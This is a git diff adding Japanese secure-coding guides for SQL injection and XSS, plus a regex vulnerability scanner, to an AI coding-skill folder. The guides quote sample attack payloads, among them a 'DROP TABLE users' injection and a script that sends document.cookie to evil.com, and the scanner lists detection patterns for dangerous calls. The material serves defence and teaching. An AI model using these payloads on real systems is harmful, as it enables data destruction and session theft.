+```
+
+## ウイルススキャン
+
+### ClamAVとの統合
+
+```typescript
+import NodeClam from 'clamscan';
+
+const clamav = new NodeClam();
+
+// ✅ ウイルススキャン
+async function scanFile(filepath: string): Promise<{
+  isInfected: boolean;
+  viruses: string[];
+}> {
+  await clamav.init({
+    removeInfected: false,
+    scanLog: '/var/log/clamscan.log',
+  });
+
+  const { isInfected, viruses } = await clamav.scanFile(filepath);
+
+  return { isInfected, viruses };
+}
+
+// ✅ アップロード処理に統合
+app.post('/upload', upload.single('file'), async (req, res) => {
+  if (!req.file) {
+    return res.status(400).json({ error: 'No file uploaded' });
+  }
+
+  // ウイルススキャン
+  const scanResult = await scanFile(req.file.path);
+  if (scanResult.isInfected) {
+    await fs.promises.unlink(req.file.path);
+    return res.status(400).json({
+      error: 'File contains malware',
+      viruses: scanResult.viruses,
+    });
+  }
+
+  res.json({ filename: req.file.filename });
+});
+```
+
+## チェックリスト
+
+### 検証
+- [ ] MIMEタイプをマジックバイトで検証しているか？
+- [ ] 拡張子を許可リストで検証しているか？
+- [ ] ファイルサイズを制限しているか？
+- [ ] 二重拡張子をチェックしているか？
+
+### サニタイズ
+- [ ] ファイル名をサニタイズしているか？
+- [ ] パストラバーサルを防止しているか？
+- [ ] 画像からメタデータを除去しているか？
+
+### ストレージ
+- [ ] アップロードディレクトリをWebルート外に配置しているか？
+- [ ] 適切なファイル権限を設定しているか？
+- [ ] ウイルススキャンを実装しているか？
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/input-sanitization/resources/sql-injection-prevention.md
+++ b/.claude/skills/input-sanitization/resources/sql-injection-prevention.md
@@ -1,0 +1,389 @@
+# SQLインジェクション対策
+
+## 概要
+
+SQLインジェクション攻撃を防止するためのガイドです。
+パラメータ化クエリ、ORM、入力検証の活用方法を解説します。
+
+## SQLインジェクションの仕組み
+
+### 攻撃の例
+
+```typescript
+// ❌ 脆弱なコード
+const userId = "1' OR '1'='1";
+const query = `SELECT * FROM users WHERE id = '${userId}'`;
+// 実行されるSQL: SELECT * FROM users WHERE id = '1' OR '1'='1'
+// → すべてのユーザーが返される
+
+// さらに危険な例
+const userId = "1'; DROP TABLE users; --";
+const query = `SELECT * FROM users WHERE id = '${userId}'`;
+// 実行されるSQL: SELECT * FROM users WHERE id = '1'; DROP TABLE users; --'
+// → usersテーブルが削除される
+```
+
+## パラメータ化クエリ
+
+### PostgreSQL (pg)
+
+```typescript
+import { Pool } from 'pg';
+
+const pool = new Pool();
+
+// ✅ パラメータ化クエリ
+async function getUserById(userId: string): Promise<User | null> {
+  const query = 'SELECT * FROM users WHERE id = $1';
+  const result = await pool.query(query, [userId]);
+  return result.rows[0] || null;
+}
+
+// ✅ 複数パラメータ
+async function searchUsers(name: string, email: string): Promise<User[]> {
+  const query = `
+    SELECT * FROM users
+    WHERE name ILIKE $1 AND email = $2
+  `;
+  const result = await pool.query(query, [`%${name}%`, email]);
+  return result.rows;
+}
+
+// ✅ IN句
+async function getUsersByIds(ids: string[]): Promise<User[]> {
+  const placeholders = ids.map((_, i) => `$${i + 1}`).join(', ');
+  const query = `SELECT * FROM users WHERE id IN (${placeholders})`;
+  const result = await pool.query(query, ids);
+  return result.rows;
+}
+```
+
+### MySQL
+
+```typescript
+import mysql from 'mysql2/promise';
+
+const pool = mysql.createPool({
+  host: 'localhost',
+  user: 'user',
+  password: 'password',
+  database: 'mydb',
+});
+
+// ✅ プレースホルダー使用
+async function getUserById(userId: string): Promise<User | null> {
+  const [rows] = await pool.execute(
+    'SELECT * FROM users WHERE id = ?',
+    [userId]
+  );
+  return (rows as User[])[0] || null;
+}
+
+// ✅ 名前付きプレースホルダー
+async function createUser(user: { name: string; email: string }): Promise<void> {
+  await pool.execute(
+    'INSERT INTO users (name, email) VALUES (?, ?)',
+    [user.name, user.email]
+  );
+}
+```
+
+### SQLite
+
+```typescript
+import Database from 'better-sqlite3';
+
+const db = new Database('mydb.sqlite');
+
+// ✅ プレースホルダー
+function getUserById(userId: string): User | undefined {
+  const stmt = db.prepare('SELECT * FROM users WHERE id = ?');
+  return stmt.get(userId) as User | undefined;
+}
+
+// ✅ 名前付きパラメータ
+function createUser(user: { name: string; email: string }): void {
+  const stmt = db.prepare('INSERT INTO users (name, email) VALUES (@name, @email)');
+  stmt.run(user);
+}
+```
+
+## ORM使用
+
+### Prisma
+
+```typescript
+import { PrismaClient } from '@prisma/client';
+
+const prisma = new PrismaClient();
+
+// ✅ 安全: Prismaは自動的にパラメータ化
+async function getUserById(userId: string): Promise<User | null> {
+  return prisma.user.findUnique({
+    where: { id: userId },
+  });
+}
+
+// ✅ 安全: 複雑なクエリも型安全
+async function searchUsers(filters: {
+  name?: string;
+  email?: string;
+  role?: string;
+}): Promise<User[]> {
+  return prisma.user.findMany({
+    where: {
+      name: filters.name ? { contains: filters.name } : undefined,
+      email: filters.email,
+      role: filters.role,
+    },
+  });
+}
+
+// ⚠️ 注意: $queryRawは手動でパラメータ化が必要
+async function customQuery(userId: string): Promise<User[]> {
+  // ✅ 安全: Prisma.sqlでパラメータ化
+  return prisma.$queryRaw`
+    SELECT * FROM users WHERE id = ${userId}
+  `;
+}
+
+// ❌ 危険: 文字列連結
+// return prisma.$queryRawUnsafe(`SELECT * FROM users WHERE id = '${userId}'`);
+```
+
+### Drizzle ORM
+
+```typescript
+import { drizzle } from 'drizzle-orm/node-postgres';
+import { eq, like, and } from 'drizzle-orm';
+import { users } from './schema';
+
+const db = drizzle(pool);
+
+// ✅ 安全: 型安全なクエリ
+async function getUserById(userId: string): Promise<User | undefined> {
+  const result = await db.select().from(users).where(eq(users.id, userId));
+  return result[0];
+}
+
+// ✅ 安全: 複合条件
+async function searchUsers(name: string, email: string): Promise<User[]> {
+  return db
+    .select()
+    .from(users)
+    .where(and(like(users.name, `%${name}%`), eq(users.email, email)));
+}
+```
+
+### TypeORM
+
+```typescript
+import { DataSource, Repository } from 'typeorm';
+import { User } from './entities/User';
+
+// ✅ 安全: Repository APIを使用
+async function getUserById(
+  repo: Repository<User>,
+  userId: string
+): Promise<User | null> {
+  return repo.findOne({ where: { id: userId } });
+}
+
+// ✅ 安全: QueryBuilderでパラメータ化
+async function searchUsers(
+  repo: Repository<User>,
+  name: string
+): Promise<User[]> {
+  return repo
+    .createQueryBuilder('user')
+    .where('user.name LIKE :name', { name: `%${name}%` })
+    .getMany();
+}
+
+// ⚠️ 注意: query()は手動でパラメータ化
+async function customQuery(
+  dataSource: DataSource,
+  userId: string
+): Promise<User[]> {
+  // ✅ 安全: パラメータ配列を使用
+  return dataSource.query('SELECT * FROM users WHERE id = $1', [userId]);
+}
+```
+
+## 動的クエリの安全な構築
+
+### 許可リストアプローチ
+
+```typescript
+// ✅ ソートカラムの許可リスト
+const ALLOWED_SORT_COLUMNS = ['name', 'email', 'created_at'] as const;
+type SortColumn = (typeof ALLOWED_SORT_COLUMNS)[number];
+
+function isSortColumn(column: string): column is SortColumn {
+  return ALLOWED_SORT_COLUMNS.includes(column as SortColumn);
+}
+
+async function getUsers(
+  sortBy: string,
+  order: 'ASC' | 'DESC' = 'ASC'
+): Promise<User[]> {
+  // カラム名を検証
+  if (!isSortColumn(sortBy)) {
+    throw new Error(`Invalid sort column: ${sortBy}`);
+  }
+
+  // ORDER BY は許可リストで検証済みなので直接埋め込み可能
+  const query = `SELECT * FROM users ORDER BY ${sortBy} ${order}`;
+  const result = await pool.query(query);
+  return result.rows;
+}
+```
+
+### 動的WHERE句の構築
+
+```typescript
+interface SearchFilters {
+  name?: string;
+  email?: string;
+  role?: string;
+  minAge?: number;
+  maxAge?: number;
+}
+
+async function searchUsers(filters: SearchFilters): Promise<User[]> {
+  const conditions: string[] = [];
+  const params: (string | number)[] = [];
+  let paramIndex = 1;
+
+  if (filters.name) {
+    conditions.push(`name ILIKE $${paramIndex++}`);
+    params.push(`%${filters.name}%`);
+  }
+
+  if (filters.email) {
+    conditions.push(`email = $${paramIndex++}`);
+    params.push(filters.email);
+  }
+
+  if (filters.role) {
+    conditions.push(`role = $${paramIndex++}`);
+    params.push(filters.role);
+  }
+
+  if (filters.minAge !== undefined) {
+    conditions.push(`age >= $${paramIndex++}`);
+    params.push(filters.minAge);
+  }
+
+  if (filters.maxAge !== undefined) {
+    conditions.push(`age <= $${paramIndex++}`);
+    params.push(filters.maxAge);
+  }
+
+  const whereClause = conditions.length > 0 ? `WHERE ${conditions.join(' AND ')}` : '';
+  const query = `SELECT * FROM users ${whereClause}`;
+
+  const result = await pool.query(query, params);
+  return result.rows;
+}
+```
+
+## ストアドプロシージャ
+
+```typescript
+// PostgreSQL ストアドプロシージャ
+// CREATE FUNCTION get_user_by_id(user_id UUID)
+// RETURNS TABLE(id UUID, name TEXT, email TEXT)
+// LANGUAGE plpgsql
+// AS $$
+// BEGIN
+//   RETURN QUERY SELECT u.id, u.name, u.email FROM users u WHERE u.id = user_id;
+// END;
+// $$;
+
+// ✅ ストアドプロシージャを呼び出し
+async function getUserById(userId: string): Promise<User | null> {
+  const result = await pool.query('SELECT * FROM get_user_by_id($1)', [userId]);
+  return result.rows[0] || null;
+}
+```
+
+## 入力検証
+
+```typescript
+import { z } from 'zod';
+
+// ✅ Zodで入力を検証
+const UserIdSchema = z.string().uuid();
+const EmailSchema = z.string().email();
+
+async function getUserByEmail(rawEmail: string): Promise<User | null> {
+  // 入力検証
+  const email = EmailSchema.parse(rawEmail);
+
+  // 検証済みの値でクエリ実行
+  const result = await pool.query('SELECT * FROM users WHERE email = $1', [email]);
+  return result.rows[0] || null;
+}
+
+// ✅ 複合バリデーション
+const SearchParamsSchema = z.object({
+  name: z.string().max(100).optional(),
+  email: z.string().email().optional(),
+  limit: z.number().int().min(1).max(100).default(20),
+  offset: z.number().int().min(0).default(0),
+});
+
+async function searchUsers(params: unknown): Promise<User[]> {
+  const validated = SearchParamsSchema.parse(params);
+  // ... クエリ実行
+}
+```
+
+## エラーハンドリング
+
+```typescript
+// ❌ 危険: 詳細なエラー情報を返す
+app.get('/user/:id', async (req, res) => {
+  try {
+    const user = await getUserById(req.params.id);
+    res.json(user);
+  } catch (error) {
+    // 攻撃者にSQL構文情報を与えてしまう
+    res.status(500).json({ error: error.message });
+  }
+});
+
+// ✅ 安全: 一般的なエラーメッセージを返す
+app.get('/user/:id', async (req, res) => {
+  try {
+    const user = await getUserById(req.params.id);
+    res.json(user);
+  } catch (error) {
+    // ログには詳細を記録
+    console.error('Database error:', error);
+    // クライアントには一般的なメッセージ
+    res.status(500).json({ error: 'An error occurred' });
+  }
+});
+```
+
+## データベース権限
+
+```sql
+-- アプリケーション用の制限付きユーザーを作成
+CREATE USER app_user WITH PASSWORD 'secure_password';
+
+-- 必要最小限の権限のみ付与
+GRANT SELECT, INSERT, UPDATE, DELETE ON users TO app_user;
+GRANT SELECT, INSERT ON audit_logs TO app_user;
+
+-- 危険な権限は付与しない
+-- GRANT DROP, ALTER, CREATE, TRUNCATE は付与しない
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/input-sanitization/resources/xss-prevention.md
+++ b/.claude/skills/input-sanitization/resources/xss-prevention.md
@@ -1,0 +1,364 @@
+# XSS（クロスサイトスクリプティング）対策
+
+## 概要
+
+XSS攻撃を防止するための包括的なガイドです。
+HTMLエスケープ、CSP、サニタイザーライブラリの活用方法を解説します。
+
+## XSSの種類
+
+### 1. Stored XSS（蓄積型）
+
+悪意のあるスクリプトがサーバーに保存され、他のユーザーに提供される。
+
+```typescript
+// 攻撃例: コメント投稿
+const maliciousComment = '<script>document.location="http://evil.com/steal?cookie="+document.cookie</script>';
+
+// ❌ 危険: そのまま表示
+element.innerHTML = comment;
+
+// ✅ 安全: エスケープして表示
+element.textContent = comment;
+```
+
+### 2. Reflected XSS（反射型）
+
+URLパラメータなどの入力が即座にレスポンスに反映される。
+
+```typescript
+// 攻撃URL: example.com/search?q=<script>alert('XSS')</script>
+
+// ❌ 危険
+const query = new URLSearchParams(window.location.search).get('q');
+document.getElementById('result').innerHTML = `検索結果: ${query}`;
+
+// ✅ 安全
+document.getElementById('result').textContent = `検索結果: ${query}`;
+```
+
+### 3. DOM-based XSS
+
+クライアントサイドのJavaScriptがDOMを操作する際に発生。
+
+```typescript
+// ❌ 危険なシンク
+element.innerHTML = userInput;
+element.outerHTML = userInput;
+document.write(userInput);
+eval(userInput);
+
+// ✅ 安全なシンク
+element.textContent = userInput;
+element.setAttribute('data-value', userInput);
+```
+
+## HTMLエスケープ
+
+### 基本的なエスケープ関数
+
+```typescript
+function escapeHtml(unsafe: string): string {
+  return unsafe
+    .replace(/&/g, '&amp;')
+    .replace(/</g, '&lt;')
+    .replace(/>/g, '&gt;')
+    .replace(/"/g, '&quot;')
+    .replace(/'/g, '&#039;');
+}
+
+// 使用例
+const userInput = '<script>alert("XSS")</script>';
+const safe = escapeHtml(userInput);
+// 結果: &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
+```
+
+### コンテキストに応じたエスケープ
+
+```typescript
+// HTMLコンテキスト
+function escapeHtmlContent(input: string): string {
+  return input.replace(/[&<>"']/g, (char) => ({
+    '&': '&amp;',
+    '<': '&lt;',
+    '>': '&gt;',
+    '"': '&quot;',
+    "'": '&#x27;',
+  }[char] || char));
+}
+
+// 属性コンテキスト
+function escapeHtmlAttribute(input: string): string {
+  return input.replace(/[&<>"'\n\r]/g, (char) => ({
+    '&': '&amp;',
+    '<': '&lt;',
+    '>': '&gt;',
+    '"': '&quot;',
+    "'": '&#x27;',
+    '\n': '&#x0a;',
+    '\r': '&#x0d;',
+  }[char] || char));
+}
+
+// URLコンテキスト
+function escapeUrl(input: string): string {
+  return encodeURIComponent(input);
+}
+
+// JavaScriptコンテキスト（非推奨：可能な限り避ける）
+function escapeJavaScript(input: string): string {
+  return JSON.stringify(input).slice(1, -1);
+}
+```
+
+## サニタイザーライブラリ
+
+### DOMPurify
+
+```typescript
+import DOMPurify from 'dompurify';
+
+// 基本的な使用
+const clean = DOMPurify.sanitize(dirty);
+
+// HTMLのみ許可（スクリプト除去）
+const cleanHtml = DOMPurify.sanitize(dirty, {
+  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
+  ALLOWED_ATTR: ['href', 'title'],
+});
+
+// 設定例：リッチテキストエディタ用
+const richTextConfig = {
+  ALLOWED_TAGS: [
+    'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
+    'p', 'br', 'hr',
+    'ul', 'ol', 'li',
+    'blockquote', 'pre', 'code',
+    'a', 'img',
+    'strong', 'em', 'u', 's',
+    'table', 'thead', 'tbody', 'tr', 'th', 'td',
+  ],
+  ALLOWED_ATTR: [
+    'href', 'src', 'alt', 'title', 'class',
+  ],
+  ALLOW_DATA_ATTR: false,
+};
+
+const cleanRichText = DOMPurify.sanitize(dirty, richTextConfig);
+```
+
+### sanitize-html（Node.js）
+
+```typescript
+import sanitizeHtml from 'sanitize-html';
+
+const clean = sanitizeHtml(dirty, {
+  allowedTags: ['b', 'i', 'em', 'strong', 'a'],
+  allowedAttributes: {
+    'a': ['href'],
+  },
+  allowedSchemes: ['http', 'https', 'mailto'],
+});
+```
+
+## Content Security Policy (CSP)
+
+### 基本的なCSPヘッダー
+
+```typescript
+// Express.js
+import helmet from 'helmet';
+
+app.use(
+  helmet.contentSecurityPolicy({
+    directives: {
+      defaultSrc: ["'self'"],
+      scriptSrc: ["'self'"],
+      styleSrc: ["'self'", "'unsafe-inline'"],
+      imgSrc: ["'self'", 'data:', 'https:'],
+      connectSrc: ["'self'"],
+      fontSrc: ["'self'"],
+      objectSrc: ["'none'"],
+      frameAncestors: ["'self'"],
+      formAction: ["'self'"],
+      upgradeInsecureRequests: [],
+    },
+  })
+);
+```
+
+### CSPディレクティブ一覧
+
+```http
+Content-Security-Policy:
+  default-src 'self';
+  script-src 'self' 'nonce-abc123';
+  style-src 'self' 'unsafe-inline';
+  img-src 'self' data: https:;
+  font-src 'self';
+  connect-src 'self' https://api.example.com;
+  frame-ancestors 'none';
+  form-action 'self';
+  base-uri 'self';
+  object-src 'none';
+```
+
+### Nonceベースのスクリプト許可
+
+```typescript
+import crypto from 'crypto';
+
+// ノンス生成
+function generateNonce(): string {
+  return crypto.randomBytes(16).toString('base64');
+}
+
+// Express middleware
+app.use((req, res, next) => {
+  res.locals.nonce = generateNonce();
+  res.setHeader(
+    'Content-Security-Policy',
+    `script-src 'self' 'nonce-${res.locals.nonce}'`
+  );
+  next();
+});
+
+// テンプレートでの使用
+// <script nonce="<%= nonce %>">...</script>
+```
+
+## フレームワーク別対策
+
+### React
+
+```tsx
+// ✅ 自動エスケープ（デフォルトで安全）
+function SafeComponent({ userInput }: { userInput: string }) {
+  return <div>{userInput}</div>;
+}
+
+// ⚠️ 危険：dangerouslySetInnerHTMLを使う場合は必ずサニタイズ
+import DOMPurify from 'dompurify';
+
+function RichTextComponent({ html }: { html: string }) {
+  return (
+    <div
+      dangerouslySetInnerHTML={{
+        __html: DOMPurify.sanitize(html),
+      }}
+    />
+  );
+}
+
+// ✅ href属性の検証
+function SafeLink({ url, children }: { url: string; children: React.ReactNode }) {
+  const safeUrl = url.startsWith('javascript:') ? '#' : url;
+  return <a href={safeUrl}>{children}</a>;
+}
+```
+
+### Vue.js
+
+```vue
+<template>
+  <!-- ✅ 自動エスケープ -->
+  <div>{{ userInput }}</div>
+
+  <!-- ⚠️ v-htmlは危険 -->
+  <div v-html="sanitizedHtml"></div>
+</template>
+
+<script setup lang="ts">
+import DOMPurify from 'dompurify';
+import { computed } from 'vue';
+
+const props = defineProps<{
+  userInput: string;
+  rawHtml: string;
+}>();
+
+const sanitizedHtml = computed(() =>
+  DOMPurify.sanitize(props.rawHtml)
+);
+</script>
+```
+
+## URLの検証
+
+```typescript
+// URLスキームの検証
+function isValidUrl(url: string): boolean {
+  try {
+    const parsed = new URL(url);
+    return ['http:', 'https:', 'mailto:'].includes(parsed.protocol);
+  } catch {
+    return false;
+  }
+}
+
+// JavaScript URLの検出
+function isSafeUrl(url: string): boolean {
+  const lowerUrl = url.toLowerCase().trim();
+  if (lowerUrl.startsWith('javascript:')) return false;
+  if (lowerUrl.startsWith('data:')) return false;
+  if (lowerUrl.startsWith('vbscript:')) return false;
+  return true;
+}
+
+// 安全なリンク生成
+function createSafeLink(url: string): string {
+  if (!isSafeUrl(url)) {
+    return '#';
+  }
+  if (!url.startsWith('http://') && !url.startsWith('https://')) {
+    return `https://${url}`;
+  }
+  return url;
+}
+```
+
+## ベストプラクティス
+
+### 1. 出力エンコーディング
+
+```typescript
+// コンテキストに応じたエンコーディング
+const contexts = {
+  html: (s: string) => escapeHtml(s),
+  attribute: (s: string) => escapeHtmlAttribute(s),
+  url: (s: string) => encodeURIComponent(s),
+  javascript: (s: string) => JSON.stringify(s),
+  css: (s: string) => CSS.escape(s),
+};
+```
+
+### 2. HTTPヘッダー設定
+
+```typescript
+// セキュリティヘッダー
+app.use((req, res, next) => {
+  res.setHeader('X-Content-Type-Options', 'nosniff');
+  res.setHeader('X-Frame-Options', 'DENY');
+  res.setHeader('X-XSS-Protection', '1; mode=block');
+  res.setHeader('Referrer-Policy', 'strict-origin-when-cross-origin');
+  next();
+});
+```
+
+### 3. Cookie設定
+
+```typescript
+// セキュアなCookie設定
+res.cookie('session', sessionId, {
+  httpOnly: true,    // JavaScript からアクセス不可
+  secure: true,      // HTTPS のみ
+  sameSite: 'strict', // CSRF 対策
+  maxAge: 3600000,   // 1時間
+});
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/input-sanitization/scripts/scan-vulnerabilities.mjs
+++ b/.claude/skills/input-sanitization/scripts/scan-vulnerabilities.mjs
@@ -1,0 +1,349 @@
+#!/usr/bin/env node
+/**
+ * 脆弱性スキャンスクリプト
+ * ソースコードからセキュリティ脆弱性パターンを検出します
+ *
+ * 使用方法:
+ *   node scan-vulnerabilities.mjs <directory> [--fix-suggestions] [--json]
+ *
+ * オプション:
+ *   --fix-suggestions 修正提案を表示
+ *   --json            JSON形式で出力
+ */
+
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+
+// 脆弱性パターン定義
+const VULNERABILITY_PATTERNS = {
+  // XSS脆弱性
+  xss: [
+    {
+      pattern: /innerHTML\s*=/g,
+      message: 'innerHTML への直接代入は XSS 脆弱性の原因になります',
+      severity: 'high',
+      suggestion: 'textContent を使用するか、DOMPurify でサニタイズしてください',
+    },
+    {
+      pattern: /outerHTML\s*=/g,
+      message: 'outerHTML への直接代入は XSS 脆弱性の原因になります',
+      severity: 'high',
+      suggestion: 'DOM操作メソッドを使用してください',
+    },
+    {
+      pattern: /document\.write\s*\(/g,
+      message: 'document.write は XSS 脆弱性の原因になります',
+      severity: 'high',
+      suggestion: 'DOM操作メソッドを使用してください',
+    },
+    {
+      pattern: /dangerouslySetInnerHTML/g,
+      message: 'dangerouslySetInnerHTML は XSS リスクがあります',
+      severity: 'medium',
+      suggestion: 'DOMPurify でサニタイズするか、別の方法を検討してください',
+    },
+    {
+      pattern: /\$\{[^}]+\}.*innerHTML/g,
+      message: 'テンプレートリテラルを innerHTML に使用しています',
+      severity: 'high',
+      suggestion: 'エスケープ処理を追加してください',
+    },
+  ],
+
+  // SQLインジェクション
+  sqlInjection: [
+    {
+      pattern: /`SELECT.*\$\{/gi,
+      message: 'テンプレートリテラルで SQL クエリを構築しています',
+      severity: 'critical',
+      suggestion: 'パラメータ化クエリまたは ORM を使用してください',
+    },
+    {
+      pattern: /`INSERT.*\$\{/gi,
+      message: 'テンプレートリテラルで SQL クエリを構築しています',
+      severity: 'critical',
+      suggestion: 'パラメータ化クエリまたは ORM を使用してください',
+    },
+    {
+      pattern: /`UPDATE.*\$\{/gi,
+      message: 'テンプレートリテラルで SQL クエリを構築しています',
+      severity: 'critical',
+      suggestion: 'パラメータ化クエリまたは ORM を使用してください',
+    },
+    {
+      pattern: /`DELETE.*\$\{/gi,
+      message: 'テンプレートリテラルで SQL クエリを構築しています',
+      severity: 'critical',
+      suggestion: 'パラメータ化クエリまたは ORM を使用してください',
+    },
+    {
+      pattern: /\+ ['"].*(?:SELECT|INSERT|UPDATE|DELETE)/gi,
+      message: '文字列連結で SQL クエリを構築しています',
+      severity: 'critical',
+      suggestion: 'パラメータ化クエリを使用してください',
+    },
+  ],
+
+  // コマンドインジェクション
+  commandInjection: [
+    {
+      pattern: /exec\s*\(\s*`/g,
+      message: 'exec でテンプレートリテラルを使用しています',
+      severity: 'critical',
+      suggestion: 'execFile を使用し、引数を配列で渡してください',
+    },
+    {
+      pattern: /exec\s*\([^,)]+\+/g,
+      message: 'exec で文字列連結を使用しています',
+      severity: 'critical',
+      suggestion: 'execFile を使用し、引数を配列で渡してください',
+    },
+    {
+      pattern: /child_process.*exec\s*\(/g,
+      message: 'exec の使用は危険です',
+      severity: 'high',
+      suggestion: 'execFile または spawn を使用してください',
+    },
+    {
+      pattern: /shell:\s*true/g,
+      message: 'shell: true オプションは危険です',
+      severity: 'high',
+      suggestion: 'shell: false を使用し、引数を配列で渡してください',
+    },
+  ],
+
+  // パストラバーサル
+  pathTraversal: [
+    {
+      pattern: /path\.join\s*\([^)]*req\.(params|query|body)/g,
+      message: 'ユーザー入力を直接パスに使用しています',
+      severity: 'high',
+      suggestion: 'パスをサニタイズし、ベースディレクトリを検証してください',
+    },
+    {
+      pattern: /readFile.*req\.(params|query|body)/g,
+      message: 'ユーザー入力でファイルを読み込んでいます',
+      severity: 'high',
+      suggestion: '許可リストでパスを検証してください',
+    },
+    {
+      pattern: /\.\.[\\/]/g,
+      message: 'パストラバーサルパターンが含まれています',
+      severity: 'medium',
+      suggestion: 'パスを正規化して検証してください',
+    },
+  ],
+
+  // 認証・認可
+  authentication: [
+    {
+      pattern: /password.*=.*['"][^'"]+['"]/gi,
+      message: 'ハードコードされたパスワードが含まれています',
+      severity: 'critical',
+      suggestion: '環境変数またはシークレット管理を使用してください',
+    },
+    {
+      pattern: /api[_-]?key.*=.*['"][^'"]+['"]/gi,
+      message: 'ハードコードされた API キーが含まれています',
+      severity: 'critical',
+      suggestion: '環境変数を使用してください',
+    },
+    {
+      pattern: /secret.*=.*['"][^'"]+['"]/gi,
+      message: 'ハードコードされたシークレットが含まれています',
+      severity: 'critical',
+      suggestion: '環境変数またはシークレット管理を使用してください',
+    },
+  ],
+
+  // その他
+  other: [
+    {
+      pattern: /eval\s*\(/g,
+      message: 'eval の使用は危険です',
+      severity: 'high',
+      suggestion: '別の方法を検討してください',
+    },
+    {
+      pattern: /new\s+Function\s*\(/g,
+      message: 'Function コンストラクタの使用は危険です',
+      severity: 'high',
+      suggestion: '別の方法を検討してください',
+    },
+    {
+      pattern: /Math\.random\s*\(\)/g,
+      message: 'Math.random はセキュリティ用途には不適切です',
+      severity: 'low',
+      suggestion: 'crypto.randomBytes を使用してください',
+    },
+  ],
+};
+
+// ファイル拡張子フィルター
+const TARGET_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.mjs', '.cjs'];
+
+// 行番号を取得
+function getLineNumber(content, index) {
+  return content.substring(0, index).split('\n').length;
+}
+
+// ファイルをスキャン
+function scanFile(filepath, options = {}) {
+  const content = readFileSync(filepath, 'utf-8');
+  const findings = [];
+
+  for (const [category, patterns] of Object.entries(VULNERABILITY_PATTERNS)) {
+    for (const rule of patterns) {
+      let match;
+      const regex = new RegExp(rule.pattern.source, rule.pattern.flags);
+
+      while ((match = regex.exec(content)) !== null) {
+        findings.push({
+          file: filepath,
+          line: getLineNumber(content, match.index),
+          category,
+          message: rule.message,
+          severity: rule.severity,
+          match: match[0].substring(0, 50),
+          suggestion: options.fixSuggestions ? rule.suggestion : undefined,
+        });
+      }
+    }
+  }
+
+  return findings;
+}
+
+// ディレクトリを再帰的にスキャン
+function scanDirectory(dir, options = {}) {
+  const allFindings = [];
+
+  function walk(currentDir) {
+    const entries = readdirSync(currentDir);
+
+    for (const entry of entries) {
+      const fullPath = join(currentDir, entry);
+      const stat = statSync(fullPath);
+
+      if (stat.isDirectory()) {
+        // node_modules, .git などをスキップ
+        if (!['node_modules', '.git', 'dist', 'build', '.next'].includes(entry)) {
+          walk(fullPath);
+        }
+      } else if (TARGET_EXTENSIONS.includes(extname(entry))) {
+        const findings = scanFile(fullPath, options);
+        allFindings.push(...findings);
+      }
+    }
+  }
+
+  walk(dir);
+  return allFindings;
+}
+
+// 結果をフォーマット
+function formatResults(findings, options = {}) {
+  if (options.json) {
+    return JSON.stringify(findings, null, 2);
+  }
+
+  if (findings.length === 0) {
+    return '✅ 脆弱性は検出されませんでした';
+  }
+
+  const grouped = {};
+  for (const finding of findings) {
+    const key = finding.severity;
+    if (!grouped[key]) grouped[key] = [];
+    grouped[key].push(finding);
+  }
+
+  const severityOrder = ['critical', 'high', 'medium', 'low'];
+  const severityLabels = {
+    critical: '🔴 CRITICAL',
+    high: '🟠 HIGH',
+    medium: '🟡 MEDIUM',
+    low: '🟢 LOW',
+  };
+
+  let output = '\n📊 脆弱性スキャン結果\n';
+  output += '═'.repeat(60) + '\n';
+
+  for (const severity of severityOrder) {
+    if (grouped[severity] && grouped[severity].length > 0) {
+      output += `\n${severityLabels[severity]} (${grouped[severity].length}件)\n`;
+      output += '─'.repeat(60) + '\n';
+
+      for (const finding of grouped[severity]) {
+        output += `\n📁 ${finding.file}:${finding.line}\n`;
+        output += `   ${finding.message}\n`;
+        output += `   マッチ: ${finding.match}...\n`;
+        if (finding.suggestion) {
+          output += `   💡 ${finding.suggestion}\n`;
+        }
+      }
+    }
+  }
+
+  output += '\n' + '═'.repeat(60) + '\n';
+  output += `📈 合計: ${findings.length}件の脆弱性を検出\n`;
+  output += `   CRITICAL: ${grouped.critical?.length || 0}\n`;
+  output += `   HIGH: ${grouped.high?.length || 0}\n`;
+  output += `   MEDIUM: ${grouped.medium?.length || 0}\n`;
+  output += `   LOW: ${grouped.low?.length || 0}\n`;
+
+  return output;
+}
+
+// メイン処理
+function main() {
+  const args = process.argv.slice(2);
+
+  if (args.length === 0 || args.includes('--help')) {
+    console.log(`
+脆弱性スキャンスクリプト
+
+使用方法:
+  node scan-vulnerabilities.mjs <directory> [options]
+
+オプション:
+  --fix-suggestions 修正提案を表示
+  --json            JSON形式で出力
+  --help            ヘルプを表示
+
+例:
+  node scan-vulnerabilities.mjs ./src
+  node scan-vulnerabilities.mjs ./src --fix-suggestions
+  node scan-vulnerabilities.mjs ./src --json > report.json
+
+検出する脆弱性:
+  - XSS (Cross-Site Scripting)
+  - SQL インジェクション
+  - コマンドインジェクション
+  - パストラバーサル
+  - ハードコードされた認証情報
+  - eval/Function の使用
+`);
+    process.exit(0);
+  }
+
+  const targetDir = args.find((a) => !a.startsWith('--'));
+  const options = {
+    fixSuggestions: args.includes('--fix-suggestions'),
+    json: args.includes('--json'),
+  };
+
+  try {
+    const findings = scanDirectory(targetDir, options);
+    console.log(formatResults(findings, options));
+
+    // 終了コード: CRITICAL/HIGHがあれば1
+    const hasCritical = findings.some((f) => f.severity === 'critical' || f.severity === 'high');
+    process.exit(hasCritical ? 1 : 0);
+  } catch (error) {
+    console.error(`❌ エラー: ${error.message}`);
+    process.exit(1);
+  }
+}
+
+main();

--- a/.claude/skills/input-sanitization/templates/sanitization-utils.ts
+++ b/.claude/skills/input-sanitization/templates/sanitization-utils.ts
@@ -1,0 +1,366 @@
+/**
+ * サニタイズユーティリティ
+ *
